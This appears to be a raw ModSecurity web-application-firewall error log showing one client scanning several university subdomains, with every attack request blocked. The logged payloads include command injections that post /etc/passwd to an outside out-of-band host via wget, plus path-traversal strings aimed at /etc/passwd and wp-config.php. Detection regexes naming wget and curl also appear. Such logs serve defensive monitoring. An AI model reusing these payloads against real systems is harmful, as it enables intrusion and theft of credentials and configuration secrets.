[Tue Aug 29 11:47:06.500368 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXUAAAAY"]
[Tue Aug 29 11:47:06.570112 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT3@AAAAAD"]
[Tue Aug 29 11:47:06.570179 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT3@AAAAAD"]
[Tue Aug 29 11:47:07.398541 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26guaw4wpuadugyr.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAh130MAAAAz"]
[Tue Aug 29 11:47:07.548453 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26guj8otut64ducg.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjKyv4AAAAQ"]
[Tue Aug 29 11:47:07.589868 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14S8Co-f0AAAjavy8AAAAV"]
[Tue Aug 29 11:47:07.589946 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14S8Co-f0AAAjavy8AAAAV"]
[Tue Aug 29 11:47:07.609162 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gmuor98tup5414.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavzAAAAAV"]
[Tue Aug 29 11:47:07.629736 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gq1im63xyymrbt.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavzEAAAAV"]
[Tue Aug 29 11:47:07.694534 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavzQAAAAV"]
[Tue Aug 29 11:47:07.708125 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gim7fmngtqs368.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjCbCgAAAAB"]
[Tue Aug 29 11:47:07.730895 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjCbCkAAAAB"]
[Tue Aug 29 11:47:07.731112 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjZRYkAAAAS"]
[Tue Aug 29 11:47:07.760736 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavzYAAAAV"]
[Tue Aug 29 11:47:07.776734 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjZRYsAAAAS"]
[Tue Aug 29 11:47:08.375652 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gt3xmn4ggipf3z.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14TMCo-f0AAAjCbCwAAAAB"]
[Tue Aug 29 11:47:08.546750 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14TMCo-f0AAAjCbDIAAAAB"]
[Tue Aug 29 11:47:10.445109 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjrbGoAAAAP"]
[Tue Aug 29 11:47:10.489908 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjZRZIAAAAS"]
[Tue Aug 29 11:47:10.491262 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjIhn4AAAAJ"]
[Tue Aug 29 11:47:10.505882 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjkM04AAAAI"]
[Tue Aug 29 11:47:11.264711 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14T8Co-f0AAAh131cAAAAz"]
[Tue Aug 29 11:47:11.400230 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAh131sAAAAz"]
[Tue Aug 29 11:47:11.505326 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14T8Co-f0AAAjkM1wAAAAI"]
[Tue Aug 29 11:47:11.863215 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjCbD0AAAAB"]
[Tue Aug 29 11:47:11.866458 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjbwzoAAAAW"]
[Tue Aug 29 11:47:11.885548 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjtc0EAAAAX"]
[Tue Aug 29 11:47:11.887069 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjCbD4AAAAB"]
[Tue Aug 29 11:47:12.359324 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14UMCo-f0AAAj111sAAAAa"]
[Tue Aug 29 11:47:13.377643 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAj1118AAAAa"]
[Tue Aug 29 11:47:13.412454 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjav0sAAAAV"]
[Tue Aug 29 11:47:13.420055 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAi@TCoAAAAM"]
[Tue Aug 29 11:47:13.422962 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjCbEgAAAAB"]
[Tue Aug 29 11:47:13.431391 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UcCo-f0AAAhzvqgAAAAx"]
[Tue Aug 29 11:47:13.466291 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjkM2EAAAAI"]
[Tue Aug 29 11:47:14.366600 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAhzvqsAAAAx"]
[Tue Aug 29 11:47:14.367069 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjav08AAAAV"]
[Tue Aug 29 11:47:14.373657 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAcsLeUAAAAE"]
[Tue Aug 29 11:47:14.379311 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjIhoQAAAAJ"]
[Tue Aug 29 11:47:14.395736 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UsCo-f0AAAjrbHAAAAAP"]
